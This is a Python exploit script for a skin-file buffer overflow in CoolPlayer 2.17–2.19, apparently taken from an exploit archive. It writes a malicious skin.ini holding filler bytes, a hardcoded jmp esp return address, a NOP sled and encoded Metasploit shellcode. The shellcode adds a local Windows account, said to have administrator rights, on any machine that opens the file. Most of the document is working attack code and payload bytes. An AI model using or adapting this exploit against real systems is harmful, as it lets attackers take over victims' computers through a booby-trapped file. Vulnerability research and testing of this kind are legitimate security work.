
# Title : CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit (py)
# Published : 2008-12-22
# Author : Encrypt3d.M!nd


# CoolPlayer (Skin) Buffer Overflow
# possibly all versions are affected; only 2.17-2.19 were actually tested (see below) :)
# By:Encrypt3d.M!nd
#
# Original exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# I tested the original on my box (WinXP SP3) and it did not work,
# so I rewrote the exploit; this version works.
# tested: Windows XP SP3, fully patched
# versions tested: 2.17, 2.18, 2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################

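# --- Payload layout ---------------------------------------------------------
# The skin file is a plain INI: a "[CoolPlayer Skin]" section whose
# "PlaylistSkin=" value overruns a fixed-size buffer in the player.
#
#   PlaylistSkin= | "A" * 1511 | saved EIP (4 bytes) | NOP sled (10) | shellcode
#
# The 1511-byte distance to the saved return address is what the author found
# for 2.17-2.19 on XP SP3; other builds may lay the stack out differently, so
# re-derive the offset with a cyclic pattern before reusing this elsewhere.
#
# All payload pieces are bytes literals (Python 2.6+ / 3.x) so that the raw
# return-address and shellcode bytes survive unchanged regardless of the
# interpreter's default text encoding.

# Filler up to the saved return address.
chars = b"A" * 1511

# Overwritten return address, little-endian: 0x7E498C6B, which the author
# identifies as a "jmp esp" inside user32.dll. It is specific to the Windows
# XP SP3 user32.dll the exploit was tested against (XP has no ASLR); it will
# not be valid on other Windows builds and is the first thing to swap when
# porting.
eip = b"\x6B\x8C\x49\x7E"  # user32.dll jmp esp

# INI section header and key; the overflow is in the value after "=".
header = b"[CoolPlayer Skin]\nPlaylistSkin="

# win32_adduser -  PASS=t35t EXITFUNC=seh USER=t35t Size=489
# Encoder=PexAlphaNum http://metasploit.com
#
# NOTE: this payload creates a local Windows account "t35t" with password
# "t35t" on whatever machine opens the skin file (the stock Metasploit
# adduser payload also adds the account to the local Administrators group -
# confirm against the generator you used). Run it only on a disposable lab
# box and remove the account afterwards; swap in a benign payload (e.g.
# calc) when you only need to prove control of EIP.
shellcode = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
    b"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57"
    b"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
    b"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
    b"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
    b"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    b"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58"
    b"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"
    b"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
    b"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
    b"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37"
    b"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
    b"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
    b"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33"
    b"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
    b"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49"
    b"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46"
    b"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56"
    b"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46"
    b"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47"
    b"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54"
    b"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32"
    b"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36"
    b"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56"
    b"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37"
    b"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52"
    b"\x41\x54\x46\x34\x46\x34\x42\x50\x5a"
)


def build_poc():
    """Return the complete skin-file contents as bytes.

    Layout: header + 1511 filler bytes + 4-byte return address + 10-byte
    NOP sled + 489-byte shellcode, 2045 bytes in total.
    """
    return header + chars + eip + b"\x90" * 10 + shellcode


def write_poc(path="skin.ini"):
    """Write the PoC skin file to ``path`` (default: ./skin.ini) and return
    the number of bytes written.

    The file is opened in binary mode so the return address and shellcode
    are written byte-for-byte on every platform and interpreter: a text-mode
    handle would re-encode bytes >= 0x80 under Python 3 and could rewrite
    the "\\n" in the header as "\\r\\n" on Windows.
    """
    data = build_poc()
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    write_poc()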
